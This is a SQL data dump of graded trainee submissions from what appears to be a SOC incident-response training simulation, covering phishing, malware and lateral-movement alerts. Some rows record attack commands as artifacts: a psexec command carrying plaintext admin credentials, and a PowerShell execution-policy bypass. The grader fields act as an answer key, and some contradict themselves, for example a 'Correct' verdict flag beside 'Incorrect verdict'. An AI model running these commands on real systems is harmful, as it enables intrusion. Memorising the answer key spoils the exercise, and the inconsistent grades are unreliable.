(475, 225, 1451, 'graded', 88, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/5)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.5\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"close_alert\",\"block_hash\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:47:59 PM\\nALERT: Spear-Phishing Email Detected [OP: Operation CryptoCore]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.5\\n- [EMAIL] trustedpartner@example.com\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:48:52.914Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/5)\",\"missed_items\":[\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', '2026-03-09 08:55:02', '2026-03-09 05:47:02', '2026-03-09 05:48:52', 0, NULL),
(476, 225, 1452, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.5\",\"ip-10.0.0.15\",\"hash-f1d2d2f9\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"block_hash\",\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:49:47 PM\\nALERT: Malicious Document Execution [OP: Operation CryptoCore]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.5\\n- [IP] 10.0.0.15\\n- [HASH] f1d2d2f924e986ac86fdf7b36c94bcdf32beec15\\n- [FILENAME] invoice_2023.docx\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:49:52.454Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 05:48:52', '2026-03-09 05:49:52', 0, NULL),
(477, 225, 1453, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.15\",\"hash-e99a18c4\",\"artifact_3\"],\"selectedActions\":[\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_hash\",\"isolate_host\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:50:37 PM\\nALERT: Credential Harvesting via Password Manager Exploit [OP: Operation CryptoCore]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.15\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [FILENAME] password_manager_exploit_v2.dll\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:50:40.382Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 05:49:52', '2026-03-09 05:50:40', 0, NULL),
(478, 225, 1454, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.5.3.25\",\"ip-192.168.14.45\",\"ip-203.0.113.15\",\"hash-3f8a5dc7\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:51:34 PM\\nALERT: Lateral Movement Detected [OP: Operation CryptoCore]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 10.5.3.25\\n- [IP] 192.168.14.45\\n- [IP] 203.0.113.15\\n- [HASH] 3f8a5dc7c9b1e9e3e4d6a8b5f1a2c3d4\\n- [USERNAME] jdoe\\n- [FILENAME] malicious_payload.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:51:41.090Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 05:50:40', '2026-03-09 05:51:41', 0, NULL),
(479, 225, 1455, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:52:25 PM\\nALERT: Data Exfiltration Attempt [OP: Operation CryptoCore]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 185.93.1.23\\n- [USERNAME] jane.doe\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [FILENAME] financial_report_Q3.xlsx\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:52:31.894Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 05:51:41', '2026-03-09 05:52:31', 0, NULL),
(480, 225, 1366, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.10\",\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:55:17 PM\\nALERT: Suspicious LinkedIn Connection Request [OP: Operation Dream Job]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 192.168.1.10\\n- [EMAIL] john.doe@toptechtalent.com\\n- [IP] 203.0.113.45\\n- [URL] http://maliciouslink.com/joboffer\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:55:22.270Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 09:02:14', '2026-03-09 05:54:14', '2026-03-09 05:55:22', 0, NULL),
(481, 225, 1367, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-09 05:55:22', '2026-03-09 05:55:22', 0, NULL),
(482, 266, 268, 'graded', 93, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15/03/2026, 20:14:10\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T14:44:25.641Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 12:23:18', '2026-03-15 14:44:25', 0, NULL),
(483, 55, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-09 12:47:22', '2026-03-09 12:47:22', 0, NULL),
(484, 266, 1431, 'graded', 90, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.10\",\"hash-d41d8cd9\",\"cmd-1\"],\"selectedActions\":[\"isolate_host\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 09/03/2026, 18:56:28\\nALERT: Data Exfiltration via USB Device Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.1.10\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [COMMAND] copy C:\\\\Sensitive\\\\report.pdf E:\\\\\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Isolate Host\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T13:26:47.804Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)\",\"missed_items\":[\"reset_credentials\"],\"strengths\":\"Solid analysis\"}', '2026-03-09 16:26:33', '2026-03-09 13:19:33', '2026-03-09 13:26:47', 0, NULL),
(485, 266, 1439, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"ip-192.168.1.55\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 09/03/2026, 19:11:51\\nALERT: Possible Insider Data Leak Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 192.168.1.55\\n- [EMAIL] personalemail@example.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Isolate Host\\n- Reset Credentials\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T13:42:00.340Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 16:40:20', '2026-03-09 13:32:20', '2026-03-09 13:42:00', 0, NULL),
(486, 232, 738, 'graded', 100, 'Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.0.2.25\",\"ip-192.168.1.15\",\"artifact_1\"],\"selectedActions\":[\"close_alert\",\"escalate\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 11:49:30 PM\\nALERT: Suspicious Email Flagged as Possible False Positive\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.0.2.25\\n- [IP] 192.168.1.15\\n- [EMAIL] newsletter@trustedsource.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Escalate to Tier 3\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T18:19:31.760Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 21:25:10', '2026-03-09 18:18:10', '2026-03-09 18:19:31', 0, NULL),
(487, 232, 938, 'graded', 100, 'Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.5.15\",\"ip-192.168.5.20\",\"cmd-1\"],\"selectedActions\":[\"close_alert\",\"escalate\",\"collect_forensics\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 11:52:16 PM\\nALERT: Failed Process Execution from Internal Script\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.5.15\\n- [IP] 192.168.5.20\\n- [COMMAND] powershell.exe -ExecutionPolicy Bypass -File C:\\\\scripts\\\\update.ps1\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Collect Forensics\\n- Escalate to Tier 3\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T18:22:17.089Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 21:24:54', '2026-03-09 18:19:54', '2026-03-09 18:22:17', 0, NULL),
(488, 232, 1310, 'graded', 100, 'Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.5.25\",\"artifact_2\"],\"selectedActions\":[\"close_alert\",\"collect_forensics\",\"escalate\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 11:53:28 PM\\nALERT: False Positive: Legitimate Cloud Configuration Change\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 192.168.5.25\\n- [USERNAME] admin_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Collect Forensics\\n- Escalate to Tier 3\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T18:23:29.698Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 21:31:37', '2026-03-09 18:22:37', '2026-03-09 18:23:29', 0, NULL),
(489, 225, 681, 'graded', 60, 'Incorrect verdict. Expected false_positive, got true_positive. Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.0.2.10\",\"ip-192.168.5.10\",\"domain-http://legit\",\"artifact_1\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/10/2026, 10:40:37 AM\\nALERT: Phishing Email Detected with Clean URL\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 192.0.2.10\\n- [IP] 192.168.5.10\\n- [DOMAIN] http://legitimate-site.com\\n- [EMAIL] info@securemail.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T23:40:49.901Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Incorrect verdict. Expected false_positive, got true_positive. Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', '2026-03-10 02:39:25', '2026-03-09 23:30:25', '2026-03-09 23:40:49', 0, NULL),
(490, 225, 611, 'graded', 60, 'Verdict is correct (+40). Missed critical artifacts: command psexec.exe \\\\192.168.1.25 -u admin -p password cmd.exe (0/1). Missed response actions (2/3)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-192.168.1.25\",\"cmd-1\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\",\"collect_forensics\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/10/2026, 11:01:23 AM\\nALERT: Internal Network Lateral Movement via PSExec\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 192.168.1.25\\n- [COMMAND] psexec.exe \\\\\\\\192.168.1.25 -u admin -p password cmd.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T00:01:36.602Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts: command psexec.exe \\\\\\\\192.168.1.25 -u admin -p password cmd.exe (0/1). Missed response actions (2/3)\",\"missed_items\":[\"command: psexec.exe \\\\\\\\192.168.1.25 -u admin -p password cmd.exe\",\"close_alert\"],\"strengths\":\"Needs improvement\"}', '2026-03-10 03:05:34', '2026-03-09 23:59:34', '2026-03-10 00:01:36', 0, NULL),
(491, 225, 1372, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"artifact_2\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 9:16:27 AM\\nALERT: Brute Force Attack Detected from Malicious IP\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 203.0.113.45\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T22:16:26.465Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-10 03:06:54', '2026-03-10 00:01:54', '2026-03-10 22:16:26', 0, NULL),
(492, 34, 1461, 'investigating', NULL, NULL, NULL, NULL, '2026-03-10 03:39:47', '2026-03-10 00:31:47', '2026-03-10 00:31:47', 0, NULL),
(493, 271, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-10 05:08:11', '2026-03-10 05:08:11', 0, NULL),
(494, 251, 269, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"escalate\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/10/2026, 10:55:21 AM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T05:25:26.772Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-10 05:22:50', '2026-03-10 05:25:26', 0, NULL),
(495, 251, 270, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"block_ip\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/10/2026, 10:58:28 AM\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T05:28:29.664Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-10 05:25:26', '2026-03-10 05:28:29', 0, NULL),
(496, 225, 1466, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.105\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 9:18:32 AM\\nALERT: Initial Access via Spear Phishing [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.105\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [DOMAIN] update-portal.example.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T22:18:34.663Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-11 01:25:25', '2026-03-10 22:17:25', '2026-03-10 22:18:34', 0, NULL),
(497, 225, 1467, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.15\",\"hash-d41d8cd9\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 9:19:52 AM\\nALERT: Execution of Malicious Payload [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.15\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] payload.exe\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T22:19:55.365Z\"}', 